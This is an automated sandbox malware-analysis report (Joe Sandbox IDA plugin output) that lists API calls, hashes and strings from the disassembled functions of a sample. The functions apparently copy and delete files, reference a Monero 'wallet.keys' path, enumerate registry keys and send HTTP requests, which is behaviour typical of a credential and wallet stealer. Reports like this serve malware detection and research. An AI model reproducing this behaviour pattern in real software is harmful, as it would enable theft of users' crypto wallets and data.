Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: c691bfb73e323e48bc28a2d2a4267342574dfa0970c5f923a32f8410e38e1796
Instruction ID: f888daf7a334279c50e6918c3342547e11f8248600c9f48df6d9afaba9ca1bc3
Opcode Fuzzy Hash: c691bfb73e323e48bc28a2d2a4267342574dfa0970c5f923a32f8410e38e1796
Instruction Fuzzy Hash: 5232F171920118ABEB15FBA0DC95FEEB378BF94700F40419AF106A3191DF786A49CF66

Function 0097A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0098AA70: StrCmpCA.SHLWAPI(00848F68,0097A7A7,?,0097A7A7,00848F68), ref: 0098AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0097AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0097AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0097ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097A8B0

Part of subcall function 0098A820: lstrlen.KERNEL32(00974F05,?,?,00974F05,00990DDE), ref: 0098A82B
Part of subcall function 0098A820: lstrcpy.KERNEL32(00990DDE,00000000), ref: 0098A885

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

lstrcat.KERNEL32(?,00000000), ref: 0097ACEB
lstrcat.KERNEL32(?,00991320), ref: 0097ACFA
lstrcat.KERNEL32(?,00000000), ref: 0097AD0D
lstrcat.KERNEL32(?,00991324), ref: 0097AD1C
lstrcat.KERNEL32(?,00000000), ref: 0097AD2F
lstrcat.KERNEL32(?,00991328), ref: 0097AD3E
lstrcat.KERNEL32(?,00000000), ref: 0097AD51
lstrcat.KERNEL32(?,0099132C), ref: 0097AD60
lstrcat.KERNEL32(?,00000000), ref: 0097AD73
lstrcat.KERNEL32(?,00991330), ref: 0097AD82
lstrcat.KERNEL32(?,00000000), ref: 0097AD95
lstrcat.KERNEL32(?,00991334), ref: 0097ADA4
lstrcat.KERNEL32(?,00000000), ref: 0097ADB7
lstrlen.KERNEL32(?), ref: 0097AE0D
lstrlen.KERNEL32(?), ref: 0097AE1C

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

DeleteFileA.KERNEL32(00000000), ref: 0097AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0097ABD4

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: f1c7e277720625367aa4ac310f4dd9bbd5dcef77172ab7c0b3c4f20b5cf6a3b8
Instruction ID: 3e2232f1b2d9ecc5541f7100c44346af3488e38de95959e172cc767b2db8ec58
Opcode Fuzzy Hash: f1c7e277720625367aa4ac310f4dd9bbd5dcef77172ab7c0b3c4f20b5cf6a3b8
Instruction Fuzzy Hash: 16121E72910108ABEB08FBA0DD96EEE7378BF94300F504159F507A7191DE79AE05CB76

Function 00975960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Part of subcall function 009747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974839
Part of subcall function 009747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974849

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009759F8
StrCmpCA.SHLWAPI(?,0084EAD8), ref: 00975A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00975B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0084EAE8,00000000,?,0084A720,00000000,?,00991A1C), ref: 00975E71
lstrlen.KERNEL32(00000000), ref: 00975E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00975E93
RtlAllocateHeap.NTDLL(00000000), ref: 00975E9A
lstrlen.KERNEL32(00000000), ref: 00975EAF
lstrlen.KERNEL32(00000000), ref: 00975ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00975EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00975F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00975F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00975F4C
InternetCloseHandle.WININET(00000000), ref: 00975FB0
InternetCloseHandle.WININET(00000000), ref: 00975FBD
HttpOpenRequestA.WININET(00000000,0084EA08,?,0084DFC0,00000000,00000000,00400100,00000000), ref: 00975BF8

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

InternetCloseHandle.WININET(00000000), ref: 00975FC7

Strings

", xrefs: 00975E16
", xrefs: 00975CD5
------, xrefs: 00975C0B
------, xrefs: 00975A96
------, xrefs: 00975D4C

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: a09c9d4148661a2320b89fc3c06b4c6d3407c484e191750b729fdee05d28ae13
Instruction ID: 18bc8efae96890c4dfd97926689135534975d24757aba6306fa54dc5a5dd46d5
Opcode Fuzzy Hash: a09c9d4148661a2320b89fc3c06b4c6d3407c484e191750b729fdee05d28ae13
Instruction Fuzzy Hash: 2212CF71820118ABEB15FBA0DC95FEEB378BF94700F50419AF106A3191EF746A4ACF65

Function 0097CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 00988B60: GetSystemTime.KERNEL32(00990E1A,0084A570,009905AE,?,?,009713F9,?,0000001A,00990E1A,00000000,?,00849138,?,\Monero\wallet.keys,00990E17), ref: 00988B86

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0097D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0097D0CE
lstrcat.KERNEL32(?,00000000), ref: 0097D208
lstrcat.KERNEL32(?,00991478), ref: 0097D217
lstrcat.KERNEL32(?,00000000), ref: 0097D22A
lstrcat.KERNEL32(?,0099147C), ref: 0097D239
lstrcat.KERNEL32(?,00000000), ref: 0097D24C
lstrcat.KERNEL32(?,00991480), ref: 0097D25B
lstrcat.KERNEL32(?,00000000), ref: 0097D26E
lstrcat.KERNEL32(?,00991484), ref: 0097D27D
lstrcat.KERNEL32(?,00000000), ref: 0097D290
lstrcat.KERNEL32(?,00991488), ref: 0097D29F
lstrcat.KERNEL32(?,00000000), ref: 0097D2B2
lstrcat.KERNEL32(?,0099148C), ref: 0097D2C1
lstrcat.KERNEL32(?,00000000), ref: 0097D2D4
lstrcat.KERNEL32(?,00991490), ref: 0097D2E3

Part of subcall function 0098A820: lstrlen.KERNEL32(00974F05,?,?,00974F05,00990DDE), ref: 0098A82B
Part of subcall function 0098A820: lstrcpy.KERNEL32(00990DDE,00000000), ref: 0098A885

lstrlen.KERNEL32(?), ref: 0097D32A
lstrlen.KERNEL32(?), ref: 0097D339

Part of subcall function 0098AA70: StrCmpCA.SHLWAPI(00848F68,0097A7A7,?,0097A7A7,00848F68), ref: 0098AA8F

DeleteFileA.KERNEL32(00000000), ref: 0097D3B4

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: f15c70eb4002d578995986af0a57e582ee146244a275805ee90b74a92a840acf
Instruction ID: 6991714f3332c352f44216a579ee4042c67305773d4ae83828998fb440bdde0a
Opcode Fuzzy Hash: f15c70eb4002d578995986af0a57e582ee146244a275805ee90b74a92a840acf
Instruction Fuzzy Hash: BEE11C71910108ABDB08FBA0DD96EEE7379BF94301F10415AF107A71A1DE79AA05CB76

Function 00988320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

RegOpenKeyExA.KERNEL32(00000000,0084B1C8,00000000,00020019,00000000,009905B6), ref: 009883A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00988426
wsprintfA.USER32 ref: 00988459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0098847B
RegCloseKey.ADVAPI32(00000000), ref: 0098848C
RegCloseKey.ADVAPI32(00000000), ref: 00988499

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Strings

?, xrefs: 0098837A
%s\%s, xrefs: 0098844D
- , xrefs: 009885A3

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 37953cae331446f4ff3c2c8128e9e0a8e57a8dd53a539b491ff1b6ad39cc1cbc
Instruction ID: 888038669fad54ce70adaddbd7f5e067fb6c9376d0d5600194fa8eb7f617ed70
Opcode Fuzzy Hash: 37953cae331446f4ff3c2c8128e9e0a8e57a8dd53a539b491ff1b6ad39cc1cbc
Instruction Fuzzy Hash: A6810C71910118ABEB24EB54CC95FEAB7B8BF48700F4086D9E109A7280DF756F85CFA5

Function 00976280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Part of subcall function 009747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974839
Part of subcall function 009747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974849

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

InternetOpenA.WININET(00990DFE,00000001,00000000,00000000,00000000), ref: 009762E1
StrCmpCA.SHLWAPI(?,0084EAD8), ref: 00976303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00976335
HttpOpenRequestA.WININET(00000000,GET,?,0084DFC0,00000000,00000000,00400100,00000000), ref: 00976385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009763BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009763D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009763FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0097646D
InternetCloseHandle.WININET(00000000), ref: 009764EF
InternetCloseHandle.WININET(00000000), ref: 009764F9
InternetCloseHandle.WININET(00000000), ref: 00976503

Strings

ERROR, xrefs: 009764C9
GET, xrefs: 0097637C
ERROR, xrefs: 00976407

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: c132d9503907fdbf0483b25e00b6c6a35682f4ac3baa811dbffd424c9b8bfa3f
Instruction ID: fba127e8360bb554a0e29e58fe25154d9c121eed14ec1d0687774e2c2795cd05
Opcode Fuzzy Hash: c132d9503907fdbf0483b25e00b6c6a35682f4ac3baa811dbffd424c9b8bfa3f
Instruction Fuzzy Hash: 91712E71A00218ABEB24EFA4DC49FEE7778BB44700F108599F509AB2D0DBB46E85CF51

Function 00985510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A820: lstrlen.KERNEL32(00974F05,?,?,00974F05,00990DDE), ref: 0098A82B
Part of subcall function 0098A820: lstrcpy.KERNEL32(00990DDE,00000000), ref: 0098A885

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009856A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985857

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

Part of subcall function 009851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985228

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 009852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985318
